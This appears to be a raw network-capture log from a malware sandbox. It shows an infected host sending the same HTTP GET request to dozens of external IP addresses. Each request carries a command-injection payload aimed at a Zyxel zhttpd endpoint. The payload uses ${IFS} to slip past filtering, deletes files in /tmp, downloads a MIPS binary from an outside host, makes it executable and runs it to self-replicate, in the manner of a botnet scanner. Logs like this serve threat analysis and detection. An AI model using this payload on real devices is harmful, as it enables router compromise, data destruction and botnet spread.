                        Mar 12, 2024 08:50:35.138515949 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2206192.168.2.1453554156.87.185.179443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.138560057 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2207192.168.2.1443274211.121.59.187443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.138611078 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2208192.168.2.143427042.179.97.229443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.143467903 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2209192.168.2.1450568191.220.50.161443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.143505096 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2210192.168.2.1444978107.99.14.76443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.143574953 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2211192.168.2.1455952188.45.80.174443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.143623114 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2212192.168.2.1459076181.111.92.136443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.143660069 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2213192.168.2.1450504156.95.27.103443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.143708944 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2214192.168.2.143759238.119.196.230443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.143762112 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2215192.168.2.145737812.173.96.212443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.143816948 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2216192.168.2.14437088.64.253.217443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.143868923 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2217192.168.2.1437974206.195.91.160443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.143927097 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2218192.168.2.145553825.8.133.225443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.143965960 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2219192.168.2.1433874110.249.237.70443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.144007921 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2220192.168.2.144814860.28.237.219443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.144033909 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2221192.168.2.14437721.109.30.203443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.144076109 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2222192.168.2.1444518137.236.93.202443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.144114017 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2223192.168.2.145187041.199.193.131443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.144165993 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2224192.168.2.1456116119.1.4.254443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.144195080 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2225192.168.2.1458422166.112.87.139443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.144247055 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2226192.168.2.1451756134.68.187.80443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.144309998 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2227192.168.2.1441290208.136.20.60443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.144360065 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2228192.168.2.1449746113.44.59.229443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.144406080 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2229192.168.2.1458552204.224.61.237443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.144459009 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2230192.168.2.1442834107.240.211.109443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.144484997 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2231192.168.2.143511480.236.70.65443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.144514084 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2232192.168.2.143688424.168.248.72443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.144566059 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2233192.168.2.1452810218.9.187.92443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.144598961 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2234192.168.2.1440354190.52.7.174443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.144646883 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2235192.168.2.144570498.54.51.236443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.144689083 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2236192.168.2.1452064135.228.18.105443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.144733906 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2237192.168.2.1458464185.218.178.2443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.144787073 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2238192.168.2.143405845.75.176.74443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.144831896 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2239192.168.2.145518041.67.51.194443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.144869089 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2240192.168.2.1458406219.7.174.219443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.144885063 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2241192.168.2.143329414.50.118.44443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.144929886 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2242192.168.2.1451118207.222.212.170443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.144968987 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2243192.168.2.143837218.10.56.163443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.144998074 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2244192.168.2.1435476169.105.56.135443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.145036936 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2245192.168.2.145707046.33.204.38443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.145072937 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2246192.168.2.1438778166.247.46.71443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.145103931 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2247192.168.2.1456820112.157.108.143443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.145169020 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2248192.168.2.144884888.228.165.178443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.145201921 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2249192.168.2.1450950152.155.246.112443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.145237923 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2250192.168.2.1433044151.102.205.68443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.145291090 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2251192.168.2.1451608193.151.196.116443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.145340919 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2252192.168.2.145838683.4.139.60443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.145382881 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2253192.168.2.144705834.110.243.186443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.145442009 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2254192.168.2.145969043.159.236.139443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.145478964 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2255192.168.2.1455606210.74.255.131443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.145505905 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2256192.168.2.1441660188.86.210.102443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.145551920 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2257192.168.2.1460658111.10.148.46443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.145591021 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2258192.168.2.144308236.1.243.98443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.145638943 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2259192.168.2.144793283.209.201.254443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.145677090 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2260192.168.2.145733838.113.18.126443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.145715952 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2261192.168.2.144062614.252.76.122443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.145742893 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2262192.168.2.145967081.9.116.10443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:35.145783901 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2263192.168.2.145847089.112.28.189443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.151642084 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2264192.168.2.14332401.71.71.53443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.151726007 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2265192.168.2.1452832221.108.210.252443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.151830912 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2266192.168.2.1453956132.184.133.245443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.151854038 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2267192.168.2.1440506195.50.67.39443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.151921988 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2268192.168.2.1453270211.71.144.199443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.151963949 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2269192.168.2.1433058149.174.49.78443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.152040005 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2270192.168.2.1449558110.171.32.186443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.152079105 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2271192.168.2.144483050.137.106.85443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.152112961 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2272192.168.2.144574017.154.43.184443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.152146101 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2273192.168.2.1449200211.58.177.179443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.152215004 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2274192.168.2.1453760151.185.180.18443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.152280092 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
